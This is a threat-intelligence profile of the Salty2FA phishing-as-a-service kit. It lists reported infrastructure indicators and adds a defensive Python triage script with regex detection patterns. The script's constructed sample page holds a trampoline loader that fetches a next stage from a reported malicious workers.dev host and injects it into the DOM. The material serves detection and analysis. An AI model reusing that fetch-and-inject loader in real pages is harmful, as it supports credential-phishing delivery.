Mallory

Salty2FA

Salty2FA is a phishing-as-a-service (PhaaS) framework built to defeat MFA/2FA and to capture credentials and session data through a multi-stage phishing flow. ANY.RUN reported it as a sophisticated 2FA-phishing kit and observed cloaking behind trusted platforms, notably Cloudflare Turnstile, to keep scanners and analysts away from the credential-harvesting stages.

In the hybrid samples ANY.RUN analyzed, the early stages attributed to Salty2FA shared a recognizable set of traits: phishing pages hosted on Cloudflare Pages (pages.dev); HTML and JavaScript artifacts such as motivational quotes embedded in the markup and CSS class names following a word-plus-number pattern; and a "trampoline" JavaScript stage whose only job is to retrieve the next stage and load it into the DOM.

Salty2FA-linked infrastructure included the decoded address hxxps://omvexe[.]shop//, which in one case failed DNS resolution with SERVFAIL at the time of analysis. The report noted a sharp decline in pure Salty2FA activity in late 2025; many later samples were non-functional or no longer behaved like typical Salty2FA. ANY.RUN assessed that the Salty2FA infrastructure may have suffered an operational failure, with campaigns falling back to Tycoon2FA-based hosting and delivery.

Researchers also observed a hybrid Salty2FA/Tycoon2FA payload: Salty2FA-like initial stages handed off to later stages that mirrored Tycoon2FA nearly line for line, including obfuscated anti-analysis logic, Microsoft login-page mimicry, dynamic routing, DGA-related infrastructure, and POSTs to Tycoon2FA's characteristic domains. ANY.RUN assessed the overlap as consistent with its earlier hypothesis of a connection to Storm-1747, which the report identifies as the operators of Tycoon2FA.

Reported indicators associated with the hybrid activity include 1otyu7944x8[.]workers[.]dev, xm65lwf0pr2e[.]workers[.]dev, and lapointelegal-portail[.]pages[.]dev.
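The traits above (word-plus-number class names, a fetch-and-inject trampoline script, pages.dev/workers.dev hosting, a Turnstile loader) and the reported indicators can be turned into a quick triage check for a captured landing page. The script below is an added example written for this page; it is not ANY.RUN's, Mallory's, or the kit's own code. The regexes, the 50% class-name threshold and the one-point-per-trait scoring are this example's own choices, not published signatures, and the sample HTML is constructed to exhibit the listed traits (it embeds one of the reported workers.dev hosts only so the IOC match has something to hit).

```python
"""Triage heuristics for Salty2FA-like landing pages (added example, not kit code)."""
from __future__ import annotations
import re
from urllib.parse import urlparse

# Indicators as reported on this page (defanged form kept verbatim).
REPORTED_IOCS = (
    "hxxps://omvexe[.]shop//",
    "1otyu7944x8[.]workers[.]dev",
    "xm65lwf0pr2e[.]workers[.]dev",
    "lapointelegal-portail[.]pages[.]dev",
)
# Hosting surfaces named in the write-up.
SUSPECT_HOST_SUFFIXES = (".pages.dev", ".workers.dev")

CLASS_ATTR_RE = re.compile(r'class\s*=\s*"([^"]*)"', re.I)
WORD_NUM_RE = re.compile(r"^[A-Za-z]+\d+$")          # e.g. "alpha17"
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
FETCH_RE = re.compile(r"\b(fetch|XMLHttpRequest)\b")
INJECT_RE = re.compile(
    r"\.(innerHTML|outerHTML)\s*=|insertAdjacentHTML\s*\(|document\.write\s*\("
    r"|createElement\s*\(\s*['\"]script['\"]"
)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")
TURNSTILE_RE = re.compile(r"challenges\.cloudflare\.com/turnstile", re.I)


def refang(ioc: str) -> str:
    """hxxps://omvexe[.]shop// -> https://omvexe.shop//"""
    return ioc.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def ioc_host(ioc: str) -> str:
    s = refang(ioc)
    return host_of(s) if "://" in s else s.lower().strip("/")


def word_number_class_ratio(html: str) -> tuple[int, int]:
    """(class tokens matching word+number, total class tokens)."""
    tokens = [t for attr in CLASS_ATTR_RE.findall(html) for t in attr.split()]
    return sum(1 for t in tokens if WORD_NUM_RE.match(t)), len(tokens)


def trampoline_scripts(html: str) -> list[str]:
    """URLs referenced by inline scripts that both fetch and inject into the DOM."""
    urls: list[str] = []
    for body in SCRIPT_RE.findall(html):
        if FETCH_RE.search(body) and INJECT_RE.search(body):
            urls.extend(URL_RE.findall(body))
    return urls


def suspect_hosts(html: str) -> list[str]:
    hosts = {host_of(u) for u in URL_RE.findall(html)}
    return sorted(h for h in hosts if h.endswith(SUSPECT_HOST_SUFFIXES))


def matched_iocs(html: str) -> list[str]:
    """Reported IOC hosts that appear anywhere in the page."""
    seen = {host_of(u) for u in URL_RE.findall(html)}
    return sorted(h for h in map(ioc_host, REPORTED_IOCS) if h in seen)


def triage(html: str) -> dict:
    hits, total = word_number_class_ratio(html)
    findings = {
        "word_number_classes": hits,
        "class_tokens": total,
        "trampoline_urls": trampoline_scripts(html),
        "suspect_hosts": suspect_hosts(html),
        "turnstile": bool(TURNSTILE_RE.search(html)),
        "matched_iocs": matched_iocs(html),
    }
    # One point per trait; threshold and weights are this example's choices.
    score = int(total > 0 and hits / total >= 0.5)
    score += bool(findings["trampoline_urls"])
    score += bool(findings["suspect_hosts"])
    score += findings["turnstile"]
    findings["score"] = score
    return findings


# Constructed sample page: not a real capture, built to show the listed traits.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
</head><body>
<div class="alpha17"><p class="note4">Believe you can and you're halfway there.</p></div>
<div class="stage9 loader" id="root"></div>
<script>
  fetch("https://xm65lwf0pr2e.workers.dev/next")
    .then(r => r.text())
    .then(t => { document.getElementById("root").innerHTML = t; });
</script>
</body></html>
"""

if __name__ == "__main__":
    for k, v in triage(SAMPLE_HTML).items():
        print(f"{k}: {v}")
```

The trampoline check is the load-bearing one: a script that only fetches, or only writes to the DOM, is ordinary web code, so the heuristic requires both in the same inline block. Treat the score as a triage prioritizer, not a verdict; the page itself notes that later samples stopped behaving like typical Salty2FA, so these traits will drift.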
